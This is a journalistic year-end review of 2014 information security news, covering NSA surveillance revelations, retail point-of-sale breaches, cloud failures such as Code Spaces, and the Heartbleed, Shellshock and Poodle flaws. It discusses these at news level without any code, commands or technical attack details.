- Robert Richardson, Editorial Director
As another year ends, we look back to try to figure out what we can take away from the security blunders and breakthroughs in 2014. It was a year of ongoing mass surveillance and game-changing data breaches. Was a tipping point finally reached?
In a perfect storm of hemorrhaging credit card info, one retailer after another in 2014 had their point-of-sale (PoS) systems fleeced by way of sloppy defenses and rampant malware. Target Corp., as patient zero, replaced all its card-swipe machines with chip-and-PIN equipment while, at Black Hat in early August, Ross Anderson (once again) reminded us that chip-and-PIN is broken several times over and in ways that he was happy to show proof-of-concept videos to illustrate.
Vendors talked about "advanced threats" as if the phrase meant something when it came to security product selection. The old C-language program code that keeps the Internet ticking broke down in frighteningly low-tech ways and no one noticed. To borrow a phrase from Dickens: Overall, 2014 represented the worst of times for security professionals.
A watched nation
The year after Snowden made his initial reveal, the first half of 2014 came with a steady stream of new information about NSA programs and methods. When former U.S. cyber czar Richard Clarke gave a keynote at the CSA Summit, held alongside the RSA Conference in February, he said NSA intelligence capabilities "are very good, far better than you could imagine. But they have created, with the growth of technologies, the potential for a police state."
One reason the NSA had such good intelligence was because it had apparently managed to facilitate backdoor-like shortcuts that made brute force breaks of encrypted communications possible within protocols that were otherwise robust enough to make such tactics highly impractical.
The intentional crippling of open protocols for cryptographic functions wasn't something the security community was inclined to find acceptable, and a skirmish quickly broke out over whether vendors had been complicit when the hobbling occurred.
The details don't lend themselves to a lightning-fast recap, but as we reported in January:
RSA has faced harsh industry criticism following a December Reuters report alleging that the EMC-owned security vendor signed a $10-million contract around 2006 with the NSA to use the flawed Dual_EC_DRBG pseudorandom number-generating algorithm as the default option in its BSAFE cryptographic library product. If true, RSA may have been a willing collaborator in helping the NSA secretly access data encrypted using that algorithm.
RSA's CEO Art Coviello denied the allegations flat out. After the RSA conference in February, the furor died. It was, perhaps, because we were learning more details about what a slick cyber-spy operation the NSA had going, with the equivalent of a shoppers' catalog of on-demand attack schemes and tools from its Tailored Access Operations (TAO) program and further leaks emerging from Glenn Greenwald's news site the Intercept in mid-March. Of particular interest: It was clearly no longer possible to rely on the security of brand-new equipment. As SearchSecurity contributor Nick Lewis, Saint Louis University's director and information security officer, spelled out: The NSA has interrupted the supply chain in attacks so that its monitoring tools will already be present on systems before the devices even connect to a target network.
Stolen card nation
Whatever the uproar over government surveillance tactics, there was arguably a bigger elephant in the room throughout 2014: America's big-box retailers seemed to have completely lost control over their credit card data.
January brought the news that many in the security industry had felt fairly sure was coming: The Target breach was considerably worse than initially advertised. Nieman Marcus announced on the first of the year that it had been violated too. Word on the street (via a Reuters article short on specific names) was that others would be coming soon. The brick-and-mortar side of businesses had come under fire and the PoS terminal was the common thread.
By now, in the waning weeks of the year, we've seen breaches at Home Depot, Michaels, Kmart, Goodwill Industries and Dairy Queen. Nor is there any clear indication that retailers have fully dealt with the threat of the RAM-scraping malware that is common in these crimes.
The data compromise of 76 million households via JPMorgan Chase's networks over the summer is raising serious questions about regulatory implications when it comes to liability and oversight of security controls at third-party vendors. We expect more breach announcements at major retailers, financial institutions and healthcare organizations among others before the year ends.
As enterprise investment in cloud services ramped up in 2014, we covered some newsworthy failures of cloud security, perhaps the most dramatic being the outright business collapse of source code hosting provider Code Spaces after hackers gained access to its Amazon Web Services control panel and deleted customer repositories (and their backups).
Our coverage cited Martin Howes, a director with Luton, U.K.-based software design and consultancy firm Springwater Software Ltd., who said his company had local copies of everything and thus wasn't greatly affected. "It's just normal caution," said Howes. "Everyone is aware of the risks of putting things in the cloud and wouldn't rely on it completely." Everyone except Code Spaces.
By August, Andres Riancho, founder of Argentina-based consultancy Bonsai Information Security, was sharing a laundry list of potential pitfalls for AWS users. Elsewhere in the cloud, Apple argued that, despite the nude celebrity photos flying around the Internet, none of this "resulted from any breach in any of Apple's systems including iCloud or Find my iPhone," according to the company's statement. By summer's end, 2014 had started to look like a good year to finally break down and use two-factor authentication across the board.
Internet of hackable things
Also on the menu at Black Hat: vulnerabilities embedded in just about anything made with hardware, including sniffing tools used by the TSA to screen air passengers, lots of current-make automobiles, communications satellites and your everyday USB thumb drive. With the BadUSB attack, there is essentially no way to determine if a USB device is infected or not, and in a press conference after his Black Hat session "BadUSB -- On Accessories That Turn Evil" presenter Karsten Nohl noted that the attack was in the TAO catalog -- well before he and his collaborator had independently created it.
Dan Geer, who gave the opening keynote for Black Hat, offered a sort of curmudgeon's Ten Commandments for Internet connectivity as technology transitions into an Internet of Things (IoT) environment, where systems are routinely "more complex than can be administered." He advocated a bluntly pragmatic approach, "splattered with Realpolitik," in which devices with embedded systems either have an enforced end of life or an automated patching process.
If the IoT is largely a forward-looking discussion, its opposing bookend for the year casts back to earlier Internet days when open-source components were written in snarled, indecipherable swatches of the C programming language. April brought Heartbleed, a longstanding flaw that went unchecked in the widely incorporated OpenSSL implementation of the TLS protocol. "This is not a joke," said Jake Williams, a principal consultant at Maryland-based CSRgroup Computer Security Consultants, whom we quoted in our news coverage. "I've been around a long time in InfoSec, and this is one of the scariest bugs I've seen. Period."
September brought us another decades-old bug, this time in the Bash shell, at the same time that McAfee data led to an estimate of 300,000 sites still at risk to Heartbleed. Whereas it wasn't entirely clear whether Heartbleed was being exploited in the wild (except by the NSA, as Bloomberg reported), hackers went straight to work on what was being dubbed "Shellshock."
October, in turn, brought us Poodle (Padding Oracle On Downgraded Legacy Encryption). What makes Poodle relevant, our coverage noted, is that the major Web browsers degrade support to SSL 3.0 for those fringe cases when they can't connect to an HTTPS server using more modern protocols. It wasn't entirely clear, as this article went to press, how severe an impact Poodle would have in the real world, but one could be forgiven for hoping that it was the final straw that would lead to a serious call to revamp the disaster-ridden TLS encryption scheme.
In other news, security salaries rose by 4.6%; Symantec jettisoned its CEO in March and then separated the saucer section -- security on one side and backup on the other -- in October; Bitcoin backslid to a ho-hum $400 share price and it led a quiet life outside the news while it sorted out various non-cryptographic security concerns; and the U.S. government issued the NIST Cybersecurity Framework 1.0, the effects of which remain muted, no doubt because compliance isn't mandatory.
Big takeaways for 2014 probably boil down to the realization that you'll need end-to-end encryption and two-factor authentication to have any hope of data privacy, and even then you probably can't keep it secret from the NSA. The spate of retail breaches has moved the mountain such that the Europay, MasterCard and Visa (EMV) standard will be ramping up all next year, though whether it stops breaches remains to be determined (stolen credit card credentials will still be usable in Internet-based transactions).
As of October, Apple Pay is on the scene, throwing Touch ID and NFS radio links at the PoS problem. We reported that Phil Dunkelberger, CEO of Palo Alto, Calif.-based authentication vendor Nok Nok Labs, noted Apple Pay was "definitely a step up from current credit card security."
The tides may have turned, but real change is hard to find. Although less in the news, the U.S. government's agencies continue their surveillance unabated, and the NSA is doubtlessly busy producing the TAO's Christmas catalog. There appear to be no serious initiatives to replace the TLS connection from browser to server with something that doesn't spit out major bugs on a regular schedule. EMV and the replacement of static strings with single-use tokens as seen in systems like Apple Pay (Google Pay did the same thing months ago but didn't generate the same interest) bode well for safer electronic transactions at physical sites. But then again, as Craig Hoffman, a partner in the privacy and data protection practice at law firm BakerHostetler, pointed out, "EMV is not itself a security solution. It's really an anti-counterfeit fraud solution." In other words, he said, "EMV chips do not prevent a hacker from breaking into a merchant's payment card network."
Whether or not the year has amounted to a turning point in information security (that remains to be seen in 2015), you can improve your lot as a security professional by making good use of some of the lessons that we painfully learned in 2014.